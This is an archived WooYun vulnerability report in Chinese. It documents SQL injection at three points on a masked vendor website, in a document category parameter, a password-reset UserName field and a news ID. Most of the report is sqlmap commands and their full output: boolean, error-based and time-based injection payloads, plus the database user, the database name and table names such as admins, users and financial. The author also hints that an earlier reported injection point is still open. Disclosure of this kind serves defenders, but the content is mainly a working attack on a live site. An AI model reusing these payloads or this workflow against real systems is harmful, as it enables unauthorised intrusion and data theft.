乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 细节已通知厂商并且等待厂商处理中 2015-09-29: 厂商已经主动忽略漏洞,细节向公众公开
多处sql注入,可以进入后台,重要信息泄漏,邮箱登录等
注入点1:
http://**.**.**.**/doc/index.php?class=邮局相关
测试
http://**.**.**.**/doc/index.php?class=邮局相关'
返回
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select count(*) from doc where 1 and ClassName='邮局相关'' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''邮局相关''' at line 1 ) [3] => Array ( [errno] => 1064 ) )
判断存在注入,直接上sqlmap测试
sqlmap.py -u "http://**.**.**.**/doc/index.php?class=邮局相关" --threads 10 --dbms "MySQL"
[23:50:09] [INFO] testing connection to the target URL[23:50:10] [INFO] testing if the target URL is stable. This can take a couple of seconds[23:50:11] [INFO] target URL is stable[23:50:11] [INFO] testing if GET parameter 'class' is dynamic[23:50:12] [WARNING] GET parameter 'class' does not appear dynamic[23:50:12] [INFO] heuristics detected web page charset 'utf-8'[23:50:12] [INFO] heuristic (basic) test shows that GET parameter 'class' mightbe injectable (possible DBMS: 'MySQL')[23:50:12] [INFO] testing for SQL injection on GET parameter 'class'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do youwant to skip test payloads specific for other DBMSes? [Y/n] ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y[23:50:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[23:50:16] [WARNING] reflective value(s) found and filtering out[23:50:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'[23:50:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'[23:50:35] [INFO] heuristics detected web page charset 'ascii'[23:50:36] [INFO] GET parameter 'class' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable[23:50:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[23:50:37] [INFO] GET parameter 'class' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[23:50:37] [INFO] testing 'MySQL inline queries'[23:50:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'[23:50:37] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[23:50:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[23:50:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[23:50:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'[23:50:38] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'[23:50:50] [INFO] GET parameter 'class' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable[23:50:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[23:50:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[23:50:56] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'[23:51:01] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'[23:51:05] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'[23:51:07] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'[23:51:08] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'[23:51:13] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'[23:51:15] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'[23:51:20] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'[23:51:26] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'[23:51:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[23:51:49] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[23:52:11] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[23:52:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[23:52:55] [CRITICAL] unable to connect to the target URL or proxy[23:53:00] [INFO] target URL appears to be UNION injectable with 97 columns[23:54:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[23:54:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[23:55:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[23:55:24] [CRITICAL] unable to connect to the target URL or proxy[23:55:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[23:56:31] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)[23:56:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[23:56:35] [INFO] target URL appears to be UNION injectable with 8 columnsinjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y[00:11:47] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. --union-char=1) and/or try to force theback-end DBMS (e.g. --dbms=mysql)[00:11:47] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrievalGET parameter 'class' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] y[00:11:49] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.sqlmap identified the following injection points with a total of 477 HTTP(s) requests:---Place: GETParameter: class Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: class=-9102' OR (3550=3550)# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: class=????' AND (SELECT 9414 FROM(SELECT COUNT(*),CONCAT(0x7162657271,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7164797771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IwBi'='IwBi Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: class=????' AND 7636=BENCHMARK(5000000,MD5(0x4772745a)) AND 'ESCx'='ESCx---[00:11:49] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[00:12:55] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[00:12:55] [INFO] fetching current user[00:12:56] [INFO] heuristics detected web page charset 'utf-8'[00:12:56] [WARNING] reflective value(s) found and filtering out[00:12:56] [INFO] retrieved: gz3721@%current user: 'gz3721@%'[00:12:56] [INFO] fetching current database[00:12:56] [INFO] retrieved: gz3721current database: 'gz3721'[00:12:56] [INFO] testing if current user is DBA[00:12:56] [INFO] fetching current usercurrent user is DBA: False[00:13:14] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[00:13:14] [INFO] fetching database users[00:13:14] [INFO] heuristics detected web page charset 'utf-8'[00:13:14] [WARNING] reflective value(s) found and filtering out[00:13:14] [INFO] the SQL query used returns 1 entries[00:13:14] [INFO] retrieved: 'gz3721'@'%'database management system users [1]:[*] 'gz3721'@'%'[00:13:40] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[00:13:40] [INFO] fetching database names[00:13:40] [INFO] heuristics detected web page charset 'utf-8'[00:13:40] [WARNING] reflective value(s) found and filtering out[00:13:40] [INFO] the SQL query used returns 2 entries[00:13:40] [INFO] starting 2 threads[00:13:41] [INFO] retrieved: information_schema[00:13:41] [INFO] retrieved: gz3721available databases [2]:[*] gz3721[*] information_schemaDatabase: gz3721[26 tables]+---------------------------------------+| 400 || database || domain || order || admins || config || dcontact || doc || email || financial || getpwd || host || mohost || news || nicebox || nicecall || onlinepay || payment_type || products || qq || question || secu_class || security || server || server_old || users |+---------------------------------------+Database: gz3721+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| doc | 247 || products | 227 || security | 48 || question | 46 || config | 33 || secu_class | 14 || users | 13 || news | 12 || financial | 8 || getpwd | 7 || `order` | 5 || onlinepay | 5 || payment_type | 5 || `domain` | 3 || dcontact | 3 || admins | 1 || email | 1 || host | 1 || qq | 1 |+---------------------------------------+---------+
注入点2:
http://**.**.**.**/user/getpwd.php
UserName存在注入
抓包
http://**.**.**.**/user/getpwd.php (POST)UserName=admin&UserMail=111111&submit=%C8%A1 %BB%D8
上sqlmap测试!~~~
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: UserName Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: UserName=admin' AND (SELECT 6049 FROM(SELECT COUNT(*),CONCAT(0x716e6b6d71,(SELECT (CASE WHEN (6049=6049) THEN 1 ELSE 0 END)),0x717a6f6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TEUP'='TEUP&UserMail=111111&submit=%C8%A1 %BB%D8---[20:52:06] [INFO] testing MySQL[20:52:06] [INFO] confirming MySQL[20:52:06] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[20:52:06] [INFO] fetching current user[20:52:06] [INFO] heuristics detected web page charset 'ascii'[20:52:06] [WARNING] reflective value(s) found and filtering out[20:52:06] [INFO] retrieved: gz3721@%current user: 'gz3721@%'[20:52:06] [INFO] fetching current database[20:52:06] [INFO] retrieved: gz3721current database: 'gz3721'[20:52:06] [INFO] testing if current user is DBA[20:52:06] [INFO] fetching current usercurrent user is DBA: False
注入点3:
http://**.**.**.**/news/show.php?NewsID=35
NewsID存在注入sqlmap测试结果!~~~
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: NewsID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: NewsID=35' AND (SELECT 3067 FROM(SELECT COUNT(*),CONCAT(0x7171787771,(SELECT (CASE WHEN (3067=3067) THEN 1 ELSE 0 END)),0x7161717771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wAfV'='wAfV---[21:03:16] [INFO] testing MySQL[21:03:16] [INFO] confirming MySQL[21:03:16] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[21:03:16] [INFO] fetching current user[21:03:16] [INFO] heuristics detected web page charset 'ascii'[21:03:16] [WARNING] reflective value(s) found and filtering out[21:03:16] [INFO] retrieved: gz3721@%current user: 'gz3721@%'[21:03:16] [INFO] fetching current database[21:03:19] [INFO] retrieved: gz3721current database: 'gz3721'[21:03:19] [INFO] testing if current user is DBA[21:03:19] [INFO] fetching current usercurrent user is DBA: False[21:03:41] [INFO] testing MySQL[21:03:41] [INFO] confirming MySQL[21:03:41] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[21:03:41] [INFO] fetching database names[21:03:42] [INFO] heuristics detected web page charset 'ascii'[21:03:42] [WARNING] reflective value(s) found and filtering out[21:03:42] [INFO] the SQL query used returns 2 entries[21:03:42] [INFO] retrieved: information_schema[21:03:43] [INFO] retrieved: gz3721available databases [2]:[*] gz3721[*] information_schema
注入测试不能太快,否则就需要等很久才能继续!~~~注入点(已被提交过的)http://**.**.**.**/bugs/wooyun-2015-0129444里面提到的
http://**.**.**.**/doc/show.php?DocID=172
DocID这个注入点依旧没有修复
你看到上面没有?
你懂的!~~~
危害等级:无影响厂商忽略
忽略时间:2015-09-29 00:16
漏洞Rank:4 (WooYun评价)
暂无